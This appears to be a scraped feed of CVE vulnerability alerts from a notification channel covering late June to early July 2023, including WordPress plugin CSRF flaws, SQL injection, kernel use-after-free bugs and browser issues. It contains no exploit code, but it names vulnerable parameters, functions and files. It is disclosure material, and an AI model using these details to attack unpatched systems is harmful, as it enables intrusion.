🚨 CVE-2023-3396A vulnerability was found in Campcodes Retro Cellphone Online Store 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/index.php. The manipulation of the argument username/password leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-232351.🎖@cveNotify |
|
| 2023-07-03 14:58:44 |
🚨 CVE-2023-36053In Django 3.2 before 3.2.20, 4 before 4.1.10, and 4.2 before 4.2.3, EmailValidator and URLValidator are subject to a potential ReDoS (regular expression denial of service) attack via a very large number of domain name labels of emails and URLs.🎖@cveNotify |
|
| 2023-07-03 14:58:43 |
🚨 CVE-2023-36630In CloudPanel before 2.3.1, insecure file upload leads to privilege escalation and authentication bypass.🎖@cveNotify |
|
| 2023-07-03 13:58:46 |
🚨 CVE-2023-35797Improper Input Validation vulnerability in Apache Software Foundation Apache Airflow Hive Provider.This issue affects Apache Airflow Apache Hive Provider: before 6.1.1.Before version 6.1.1 it was possible to bypass the security check to RCE viaprincipal parameter. For this to be exploited it requires access to modifying the connection details.It is recommended updating provider version to 6.1.1 in order to avoid this vulnerability.🎖@cveNotify |
|
| 2023-07-03 11:58:47 |
🚨 CVE-2023-3314A vulnerability arises out of a failure to comprehensively sanitize the processing of a zip file(s). Incomplete neutralization of external commands used to control the process execution of the .zip application allows an authorized user to obtain control of the .zip application to execute arbitrary commands or obtain elevation of system privileges.🎖@cveNotify |
|
| 2023-07-03 11:58:44 |
🚨 CVE-2023-3313An OS common injection vulnerability exists in the ESM certificate API, whereby incorrectly neutralized special elements may have allowed an unauthorized user to execute system command injection for the purpose of privilege escalation or to execute arbitrary commands.🎖@cveNotify |
|
| 2023-07-03 11:58:41 |
🚨 CVE-2023-3438An unquoted Windows search path vulnerability existed in the install the MOVE 4.10.x and earlier Windows install service (mvagtsce.exe). The misconfiguration allowed an unauthorized local user to insert arbitrary code into the unquoted service path to obtain privilege escalation and stop antimalware services.🎖@cveNotify |
|
| 2023-07-03 05:59:02 |
🚨 CVE-2020-36741The MultiVendorX plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.5.7. This is due to missing or incorrect nonce validation on the submit_comment() function. This makes it possible for unauthenticated attackers to submit comments via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-07-03 05:59:01 |
🚨 CVE-2020-36744The NotificationX plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.8.2. This is due to missing or incorrect nonce validation on the generate_conversions() function. This makes it possible for unauthenticated attackers to generate conversions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-07-03 05:59:00 |
🚨 CVE-2021-4389The WP Travel plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.4.6. This is due to missing or incorrect nonce validation on the save_meta_data() function. This makes it possible for unauthenticated attackers to save metadata for travel posts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-07-03 05:58:59 |
🚨 CVE-2021-4392The eCommerce Product Catalog Plugin for WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.9.43. This is due to missing or incorrect nonce validation on the implecode_save_products_meta() function. This makes it possible for unauthenticated attackers to save product meta data via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-07-03 05:58:58 |
🚨 CVE-2023-26136Versions of the package tough-cookie before 4.1.3 are vulnerable to Prototype Pollution due to improper handling of Cookies when using CookieJar in rejectPublicSuffixes=false mode. This issue arises from the manner in which the objects are initialized.🎖@cveNotify |
|
| 2023-07-03 05:58:54 |
🚨 CVE-2020-36743The Product Catalog Simple plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.5.13. This is due to missing or incorrect nonce validation on the implecode_save_products_meta() function. This makes it possible for unauthenticated attackers to update product meta via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-07-03 05:58:53 |
🚨 CVE-2021-4388The Opal Estate plugin for WordPress is vulnerable to featured property modifications in versions up to, and including, 1.6.11. This is due to missing capability checks on the opalestate_set_feature_property() and opalestate_remove_feature_property() functions. This makes it possible for unauthenticated attackers to set and remove featured properties.🎖@cveNotify |
|
| 2023-07-03 05:58:52 |
🚨 CVE-2021-4391The Ultimate Gift Cards for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.1.1. This is due to missing or incorrect nonce validation on the mwb_wgm_save_post() function. This makes it possible for unauthenticated attackers to modify product gift card details via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-07-03 05:58:48 |
🚨 CVE-2021-4393The eCommerce Product Catalog Plugin for WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.0.17. This is due to missing or incorrect nonce validation on the save() function. This makes it possible for unauthenticated attackers to save manual digital orders via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-07-03 05:58:47 |
🚨 CVE-2021-4394The Locations plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.2.1. This is due to missing or incorrect nonce validation on the saveCustomFields() function. This makes it possible for unauthenticated attackers to update custom field meta data via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-07-03 05:58:46 |
🚨 CVE-2020-36747The Lightweight Sidebar Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.4. This is due to missing or incorrect nonce validation on the metabox_save() function. This makes it possible for unauthenticated attackers to save metbox data via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-07-03 05:58:45 |
🚨 CVE-2020-36748The Dokan plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.0.8. This is due to missing or incorrect nonce validation on the handle_order_export() function. This makes it possible for unauthenticated attackers to trigger an order export via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-07-03 05:58:44 |
🚨 CVE-2021-4395The Abandoned Cart Recovery for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0.4. This is due to missing or incorrect nonce validation on the get_items() and extra_tablenav() functions. This makes it possible for unauthenticated attackers to perform read-only actions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-07-03 05:58:43 |
🚨 CVE-2021-4396The Rucy plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 0.4.4. This is due to missing or incorrect nonce validation on the save_rc_post_meta() function. This makes it possible for unauthenticated attackers to save post meta via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-07-03 05:58:41 |
🚨 CVE-2021-4397The Staff Directory Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.6. This is due to missing or incorrect nonce validation on the saveCustomFields() function. This makes it possible for unauthenticated attackers to save custom fields via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-07-03 05:58:39 |
🚨 CVE-2021-4398The Amministrazione Trasparente plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 7.1. This is due to missing or incorrect nonce validation on the at_save_aturl_meta() function. This makes it possible for unauthenticated attackers to update meta data via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-07-02 17:58:20 |
🚨 CVE-2023-3439A flaw was found in the MCTP protocol in the Linux kernel. The function mctp_unregister() reclaims the device's relevant resource when a netcard detaches. However, a running routine may be unaware of this and cause the use-after-free of the mdev->addrs object, potentially leading to a denial of service.🎖@cveNotify |
|
| 2023-07-02 17:58:19 |
🚨 CVE-2021-3573A use-after-free in function hci_sock_bound_ioctl() of the Linux kernel HCI subsystem was found in the way user calls ioct HCIUNBLOCKADDR or other way triggers race condition of the call hci_unregister_dev() together with one of the calls hci_sock_blacklist_add(), hci_sock_blacklist_del(), hci_get_conn_info(), hci_get_auth_info(). A privileged local user could use this flaw to crash the system or escalate their privileges on the system. This flaw affects the Linux kernel versions prior to 5.13-rc5.🎖@cveNotify |
|
| 2023-07-02 15:58:14 |
🚨 CVE-2023-33460There's a memory leak in yajl 2.1.0 with use of yajl_tree_parse function. which will cause out-of-memory in server and cause crash.🎖@cveNotify |
|
| 2023-07-02 06:58:13 |
🚨 CVE-2023-33204sysstat through 12.7.2 allows a multiplication integer overflow in check_overflow in common.c. NOTE: this issue exists because of an incomplete fix for CVE-2022-39377.🎖@cveNotify |
|
| 2023-07-01 11:58:33 |
🚨 CVE-2021-4401The Style Kits plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.8.0. This is due to missing or incorrect nonce validation on the update_posts_stylekit() function. This makes it possible for unauthenticated attackers to update style kits for posts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-07-01 11:58:32 |
🚨 CVE-2021-4402The Multiple Roles plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.3.1. This is due to missing or incorrect nonce validation on the mu_add_roles_in_signup_meta() and mu_add_roles_in_signup_meta_recently() functions. This makes it possible for unauthenticated attackers to add additional roles to users via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-07-01 11:58:31 |
🚨 CVE-2021-4404The Event Espresso 4 Decaf plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.10.11. This is due to missing or incorrect nonce validation on the ajaxHandler() function. This makes it possible for unauthenticated attackers to op into notifications via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-07-01 11:58:30 |
🚨 CVE-2021-4405The ElasticPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.5.3. This is due to missing or incorrect nonce validation on the epio_send_autosuggest_allowed() function. This makes it possible for unauthenticated attackers to send allowed parameters for autosuggest to elasticpress[.]io via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-07-01 11:58:26 |
🚨 CVE-2023-2431A security issue was discovered in Kubelet that allows pods to bypass the seccomp profile enforcement. Pods that use localhost type for seccomp profile but specify an empty profile field, are affected by this issue. In this scenario, this vulnerability allows the pod to run in unconfined (seccomp disabled) mode. This bug affects Kubelet.🎖@cveNotify |
|
| 2023-07-01 11:58:25 |
🚨 CVE-2022-38900decode-uri-component 0.2.0 is vulnerable to Improper Input Validation resulting in DoS.🎖@cveNotify |
|
| 2023-07-01 11:58:24 |
🚨 CVE-2020-36745The WP Project Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.4.0. This is due to missing or incorrect nonce validation on the do_updates() function. This makes it possible for unauthenticated attackers to trigger updates via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-07-01 11:58:20 |
🚨 CVE-2020-36744The NotificationX plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.8.2. This is due to missing or incorrect nonce validation on the generate_conversions() function. This makes it possible for unauthenticated attackers to generate conversions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-07-01 11:58:19 |
🚨 CVE-2021-4392The eCommerce Product Catalog Plugin for WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.9.43. This is due to missing or incorrect nonce validation on the implecode_save_products_meta() function. This makes it possible for unauthenticated attackers to save product meta data via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-07-01 11:58:18 |
🚨 CVE-2023-26136Versions of the package tough-cookie before 4.1.3 are vulnerable to Prototype Pollution due to improper handling of Cookies when using CookieJar in rejectPublicSuffixes=false mode. This issue arises from the manner in which the objects are initialized.🎖@cveNotify |
|
| 2023-07-01 11:58:15 |
🚨 CVE-2020-36740The Radio Buttons for Taxonomies plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.0.5. This is due to missing or incorrect nonce validation on the save_single_term() function. This makes it possible for unauthenticated attackers to save terms via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-07-01 11:58:14 |
🚨 CVE-2021-4390The Contact Form 7 Style plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.2. This is due to missing or incorrect nonce validation on the manage_wp_posts_be_qe_save_post() function. This makes it possible for unauthenticated attackers to quick edit templates via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-07-01 11:58:13 |
🚨 CVE-2021-4391The Ultimate Gift Cards for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.1.1. This is due to missing or incorrect nonce validation on the mwb_wgm_save_post() function. This makes it possible for unauthenticated attackers to modify product gift card details via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-07-01 05:59:04 |
🚨 CVE-2021-4386The WP Security Question plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0.5. This is due to missing or incorrect nonce validation on the save() function. This makes it possible for unauthenticated attackers to modify the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-07-01 05:59:03 |
🚨 CVE-2021-4387The Opal Estate plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.6.11. This is due to missing or incorrect nonce validation on the opalestate_set_feature_property() and opalestate_remove_feature_property() functions. This makes it possible for unauthenticated attackers to set and remove featured properties via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-07-01 05:59:01 |
🚨 CVE-2023-27964An authentication issue was addressed with improved state management. This issue is fixed in AirPods Firmware Update 5E133. When your headphones are seeking a connection request to one of your previously paired devices, an attacker in Bluetooth range might be able to spoof the intended source device and gain access to your headphones.🎖@cveNotify |
|
| 2023-07-01 05:59:00 |
🚨 CVE-2023-3420Type Confusion in V8 in Google Chrome prior to 114.0.5735.198 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-07-01 05:58:58 |
🚨 CVE-2023-3421Use after free in Media in Google Chrome prior to 114.0.5735.198 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-07-01 05:58:57 |
🚨 CVE-2023-3422Use after free in Guest View in Google Chrome prior to 114.0.5735.198 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-07-01 05:58:56 |
🚨 CVE-2023-3391A vulnerability was found in SourceCodester Human Resource Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file detailview.php. The manipulation of the argument employeeid leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-232288.🎖@cveNotify |
|
| 2023-07-01 05:58:54 |
🚨 CVE-2020-36735The WP ERP | Complete HR solution with recruitment & job listings | WooCommerce CRM & Accounting plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.6.3. This is due to missing or incorrect nonce validation on the handle_leave_calendar_filter, add_enable_disable_option_save, leave_policies, process_bulk_action, and process_crm_contact functions. This makes it possible for unauthenticated attackers to modify the plugins settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-07-01 05:58:53 |
🚨 CVE-2021-42307Microsoft Edge (Chromium-based) Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-07-01 05:58:51 |
🚨 CVE-2023-30586A privilege escalation vulnerability exists in Node.js 20 that allowed loading arbitrary OpenSSL engines when the experimental permission model is enabled, which can bypass and/or disable the permission model. The attack complexity is high. However, the crypto.setEngine() API can be used to bypass the permission model when called with a compatible OpenSSL engine. The OpenSSL engine can, for example, disable the permission model in the host process by manipulating the process's stack memory to locate the permission model Permission::enabled_ in the host process's heap memory. Please note that at the time this CVE was issued, the permission model is an experimental feature of Node.js.🎖@cveNotify |
|
| 2023-07-01 05:58:50 |
🚨 CVE-2021-31982Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2023-07-01 05:58:49 |
🚨 CVE-2021-34475Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-07-01 05:58:47 |
🚨 CVE-2021-34506Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2023-07-01 05:58:46 |
🚨 CVE-2023-28323A deserialization of untrusted data exists in EPM 2022 Su3 and all prior versions that allows an unauthenticated user to elevate rights. This exploit could potentially be used in conjunction with other OS (Operating System) vulnerabilities to escalate privileges on the machine or be used as a stepping stone to get to other network attached machines.🎖@cveNotify |
|
| 2023-07-01 05:58:44 |
🚨 CVE-2023-22814An authentication bypass issue via spoofing was discovered in the token-based authentication mechanism that could allow an attacker to carry out an impersonation attack.This issue affects My Cloud OS 5 devices: before 5.26.202.🎖@cveNotify |
|
| 2023-07-01 05:58:43 |
🚨 CVE-2023-28324A improper input validation vulnerability exists in Ivanti Endpoint Manager 2022 and below that could allow privilege escalation or remote code execution.🎖@cveNotify |
|
| 2023-07-01 05:58:42 |
🚨 CVE-2023-28365A backup file vulnerability found in UniFi applications (Version 7.3.83 and earlier) running on Linux operating systems allows application administrators to execute malicious commands on the host device being restored.🎖@cveNotify |
|
| 2023-07-01 05:58:40 |
🚨 CVE-2023-30589The llhttp parser in the http module in Node v20.2.0 does not strictly use the CRLF sequence to delimit HTTP requests. This can lead to HTTP Request Smuggling (HRS).The CR character (without LF) is sufficient to delimit HTTP header fields in the llhttp parser. According to RFC7230 section 3, only the CRLF sequence should delimit each header-field. This impacts all Node.js active versions: v16, v18, and, v20🎖@cveNotify |
|
| 2023-07-01 05:58:39 |
🚨 CVE-2023-31997UniFi OS 3.1 introduces a misconfiguration on consoles running UniFi Network that allows users on a local network to access MongoDB. Applicable Cloud Keys that are both (1) running UniFi OS 3.1 and (2) hosting the UniFi Network application. "Applicable Cloud Keys" include the following: Cloud Key Gen2 and Cloud Key Gen2 Plus.🎖@cveNotify |
|
| 2023-07-01 01:58:33 |
🚨 CVE-2021-4189A flaw was found in Python, specifically in the FTP (File Transfer Protocol) client library in PASV (passive) mode. The issue is how the FTP client trusts the host from the PASV response by default. This flaw allows an attacker to set up a malicious FTP server that can trick FTP clients into connecting back to a given IP address and port. This vulnerability could lead to FTP client scanning ports, which otherwise would not have been possible.🎖@cveNotify |
|
| 2023-07-01 01:58:32 |
🚨 CVE-2021-3733There's a flaw in urllib's AbstractBasicAuthHandler class. An attacker who controls a malicious HTTP server that an HTTP client (such as web browser) connects to, could trigger a Regular Expression Denial of Service (ReDOS) during an authentication request with a specially crafted payload that is sent by the server to the client. The greatest threat that this flaw poses is to application availability.🎖@cveNotify |
|
| 2023-07-01 01:58:31 |
🚨 CVE-2021-3737A flaw was found in python. An improperly handled HTTP response in the HTTP client code of python may allow a remote attacker, who controls the HTTP server, to make the client script enter an infinite loop, consuming CPU time. The highest threat from this vulnerability is to system availability.🎖@cveNotify |
|
| 2023-07-01 01:58:30 |
🚨 CVE-2021-3426There's a flaw in Python 3's pydoc. A local or adjacent attacker who discovers or is able to convince another local or adjacent user to start a pydoc server could access the server and use it to disclose sensitive information belonging to the other user that they would not normally be able to access. The highest risk of this flaw is to data confidentiality. This flaw affects Python versions before 3.8.9, Python versions before 3.9.3 and Python versions before 3.10.0a7.🎖@cveNotify |
|
| 2023-07-01 01:58:27 |
🚨 CVE-2023-22816A post-authentication remote command injection vulnerability in a CGI file in Western Digital My Cloud OS 5 devices that could allow an attacker to build files with redirects and execute larger payloads.This issue affects My Cloud OS 5 devices: before 5.26.300.🎖@cveNotify |
|
| 2023-07-01 01:58:26 |
🚨 CVE-2023-29241Improper Information in Cybersecurity Guidebook in Bosch Building Integration System (BIS) 5.0 may lead to wrong configuration which allows local users to access data via network🎖@cveNotify |
|
| 2023-07-01 01:58:25 |
🚨 CVE-2023-33298com.perimeter81.osx.HelperTool in Perimeter81 10.0.0.19 on macOS allows Local Privilege Escalation (to root) via shell metacharacters in usingCAPath.🎖@cveNotify |
|
| 2023-07-01 01:58:24 |
🚨 CVE-2023-3338A flaw null pointer dereference in the Linux kernel DECnet networking protocol was found. A remote user could use this flaw to crash the system.🎖@cveNotify |
|
| 2023-07-01 01:58:21 |
🚨 CVE-2023-1206A hash collision flaw was found in the IPv6 connection lookup table in the Linux kernel’s IPv6 functionality when a user makes a new kind of SYN flood attack. A user located in the local network or with a high bandwidth connection can increase the CPU usage of the server that accepts IPV6 connections up to 95%.🎖@cveNotify |
|
| 2023-07-01 01:58:20 |
🚨 CVE-2023-22815Post-authentication remote command injection vulnerabilities in Western Digital My Cloud OS 5 devices that could allow an attacker to execute code in the context of the root user on vulnerable CGI files.This issue affects My Cloud OS 5 devices: before 5.26.300.🎖@cveNotify |
|
| 2023-07-01 01:58:19 |
🚨 CVE-2023-3493Improper Neutralization of Formula Elements in a CSV File in GitHub repository fossbilling/fossbilling prior to 0.5.3.🎖@cveNotify |
|
| 2023-07-01 01:58:15 |
🚨 CVE-2023-3117A use-after-free flaw was found in the Netfilter subsystem of the Linux kernel when processing named and anonymous sets in batch requests, which can lead to performing arbitrary reads and writes in kernel memory. This flaw allows a local user with CAP_NET_ADMIN capability to crash or potentially escalate their privileges on the system.🎖@cveNotify |
|
| 2023-07-01 01:58:14 |
🚨 CVE-2021-0945In _PMRCreate of the PowerVR kernel driver, a missing bounds check means it is possible to overwrite heap memory via PhysmemNewRamBackedPMR. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-07-01 01:58:13 |
🚨 CVE-2015-7559It was found that the Apache ActiveMQ client before 5.14.5 exposed a remote shutdown command in the ActiveMQConnection class. An attacker logged into a compromised broker could use this flaw to achieve denial of service on a connected client.🎖@cveNotify |
|
| 2023-06-30 23:58:36 |
🚨 CVE-2023-21178In installKey of KeyUtil.cpp, there is a possible failure of file encryption due to a race condition. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-140762419🎖@cveNotify |
|
| 2023-06-30 23:58:35 |
🚨 CVE-2023-21179In parseSecurityParamsFromXml of XmlUtil.java, there is a possible bypass of user specified wifi encryption protocol due to improperly used crypto. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-272755865🎖@cveNotify |
|
| 2023-06-30 23:58:34 |
🚨 CVE-2023-28064Dell BIOS contains an Out-of-bounds Write vulnerability. An unauthenticated physical attacker may potentially exploit this vulnerability, leading to denial of service.🎖@cveNotify |
|
| 2023-06-30 23:58:33 |
🚨 CVE-2023-1329A potential security vulnerability has been identified for certain HP multifunction printers (MFPs). The vulnerability may lead to Buffer Overflow and/or Remote Code Execution when running HP Workpath solutions on potentially affected products.🎖@cveNotify |
|
| 2023-06-30 23:58:30 |
🚨 CVE-2023-28071Dell Command | Update, Dell Update, and Alienware Update versions 4.9.0, A01 and prior contain an Insecure Operation on Windows Junction / Mount Point vulnerability. A local malicious user could potentially exploit this vulnerability to create arbitrary folder leading to permanent Denial of Service (DOS).🎖@cveNotify |
|
| 2023-06-30 23:58:29 |
🚨 CVE-2023-28073Dell BIOS contains an improper authentication vulnerability. A locally authenticated malicious user may potentially exploit this vulnerability by bypassing certain authentication mechanisms in order to elevate privileges on the system.🎖@cveNotify |
|
| 2023-06-30 23:58:28 |
🚨 CVE-2023-28065Dell Command | Update, Dell Update, and Alienware Update versions 4.8.0 and prior contain an Insecure Operation on Windows Junction / Mount Point vulnerability. A local malicious user could potentially exploit this vulnerability leading to privilege escalation.🎖@cveNotify |
|
| 2023-06-30 23:58:27 |
🚨 CVE-2023-29147In Malwarebytes EDR 1.0.11 for Linux, it is possible to bypass the detection layers that depend on inode identifiers, because an identifier may be reused when a file is replaced, and because two files on different filesystems can have the same identifier.🎖@cveNotify |
|
| 2023-06-30 23:58:23 |
🚨 CVE-2023-35946Gradle is a build tool with a focus on build automation and support for multi-language development. When Gradle writes a dependency into its dependency cache, it uses the dependency's coordinates to compute a file location. With specially crafted dependency coordinates, Gradle can be made to write files into an unintended location. The file may be written outside the dependency cache or over another file in the dependency cache. This vulnerability could be used to poison the dependency cache or overwrite important files elsewhere on the filesystem where the Gradle process has write permissions. Exploiting this vulnerability requires an attacker to have control over a dependency repository used by the Gradle build or have the ability to modify the build's configuration. It is unlikely that this would go unnoticed. A fix has been released in Gradle 7.6.2 and 8.2 to protect against this vulnerability. Gradle will refuse to cache dependencies that have path traversal elements in their dependency coordinates. It is recommended that users upgrade to a patched version. If you are unable to upgrade to Gradle 7.6.2 or 8.2, `dependency verification` will make this vulnerability more difficult to exploit.🎖@cveNotify |
|
| 2023-06-30 23:58:22 |
🚨 CVE-2023-36348POS Codekop v2.0 was discovered to contain an authenticated remote code execution (RCE) vulnerability via the filename parameter.🎖@cveNotify |
|
| 2023-06-30 23:58:21 |
🚨 CVE-2023-34241OpenPrinting CUPS is a standards-based, open source printing system for Linux and other Unix-like operating systems. Starting in version 2.0.0 and prior to version 2.4.6, CUPS logs data of free memory to the logging service AFTER the connection has been closed, when it should have logged the data right before. This is a use-after-free bug that impacts the entire cupsd process.The exact cause of this issue is the function `httpClose(con->http)` being called in `scheduler/client.c`. The problem is that httpClose always, provided its argument is not null, frees the pointer at the end of the call, only for cupsdLogClient to pass the pointer to httpGetHostname. This issue happens in function `cupsdAcceptClient` if LogLevel is warn or higher and in two scenarios: there is a double-lookup for the IP Address (HostNameLookups Double is set in `cupsd.conf`) which fails to resolve, or if CUPS is compiled with TCP wrappers and the connection is refused by rules from `/etc/hosts.allow` and `/etc/hosts.deny`.Version 2.4.6 has a patch for this issue.🎖@cveNotify |
|
| 2023-06-30 23:58:20 |
🚨 CVE-2023-36346POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php.🎖@cveNotify |
|
| 2023-06-30 23:58:17 |
🚨 CVE-2023-34367Windows 7 is vulnerable to a full blind TCP/IP hijacking attack. The vulnerability exists in Windows 7 (any Windows until Windows 8) and in any implementation of TCP/IP, which is vulnerable to the Idle scan attack (including many IoT devices). NOTE: The vendor considers this a low severity issue.🎖@cveNotify |
|
| 2023-06-30 23:58:16 |
🚨 CVE-2023-36345A Cross-Site Request Forgery (CSRF) in POS Codekop v2.0 allows attackers to escalate privileges.🎖@cveNotify |
|
| 2023-06-30 23:58:15 |
🚨 CVE-2023-29145The Malwarebytes EDR 1.0.11 for Linux driver doesn't properly ensure whitelisting of executable libraries loaded by executable files, allowing arbitrary code execution. The attacker can set LD_LIBRARY_PATH, set LD_PRELOAD, or run an executable file in a debugger.🎖@cveNotify |
|
| 2023-06-30 23:58:14 |
🚨 CVE-2023-31543A dependency confusion in pipreqs v0.3.0 to v0.4.11 allows attackers to execute arbitrary code via uploading a crafted PyPI package to the chosen repository server.🎖@cveNotify |
|
| 2023-06-30 20:58:32 |
🚨 CVE-2022-24747Shopware is an open commerce platform based on the Symfony php Framework and the Vue javascript framework. Affected versions of shopware do no properly set sensitive HTTP headers to be non-cacheable. If there is an HTTP cache between the server and client then headers may be exposed via HTTP caches. This issue has been resolved in version 6.4.8.2. There are no known workarounds.🎖@cveNotify |
|
| 2023-06-30 20:58:31 |
🚨 CVE-2022-24741Nextcloud server is an open source, self hosted cloud style services platform. In affected versions an attacker can cause a denial of service by uploading specially crafted files which will cause the server to allocate too much memory / CPU. It is recommended that the Nextcloud Server is upgraded to 21.0.8 , 22.2.4 or 23.0.1. Users unable to upgrade should disable preview generation with the `'enable_previews'` config flag.🎖@cveNotify |
|
| 2023-06-30 20:58:30 |
🚨 CVE-2023-21157In encode of wlandata.cpp, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-263783137References: N/A🎖@cveNotify |
|
| 2023-06-30 20:58:26 |
🚨 CVE-2022-2382The Product Slider for WooCommerce WordPress plugin before 2.5.7 has flawed CSRF checks and lack authorisation in some of its AJAX actions, allowing any authenticated users, such as subscriber to call them. One in particular could allow them to delete arbitrary blog options.🎖@cveNotify |
|
| 2023-06-30 20:58:25 |
🚨 CVE-2022-28809An issue was discovered in Open Design Alliance Drawings SDK before 2023.3. An Out-of-Bounds Read vulnerability exists when reading a DWG file with an invalid vertex number in a recovery mode. An attacker can leverage this vulnerability to execute code in the context of the current process.🎖@cveNotify |
|
| 2023-06-30 20:58:24 |
🚨 CVE-2022-2389The Abandoned Cart Recovery for WooCommerce, Follow Up Emails, Newsletter Builder & Marketing Automation By Autonami WordPress plugin before 2.1.2 does not have authorisation and CSRF checks in one of its AJAX action, allowing any authenticated users, such as subscriber to create automations🎖@cveNotify |
|
| 2023-06-30 20:58:20 |
🚨 CVE-2022-23913In Apache ActiveMQ Artemis prior to 2.20.0 or 2.19.1, an attacker could partially disrupt availability (DoS) through uncontrolled resource consumption of memory.🎖@cveNotify |
|
| 2023-06-30 20:58:19 |
🚨 CVE-2023-21173In multiple methods of DataUsageList.java, there is a possible way to learn about admin user's network activities due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-262741858🎖@cveNotify |
|
| 2023-06-30 20:58:18 |
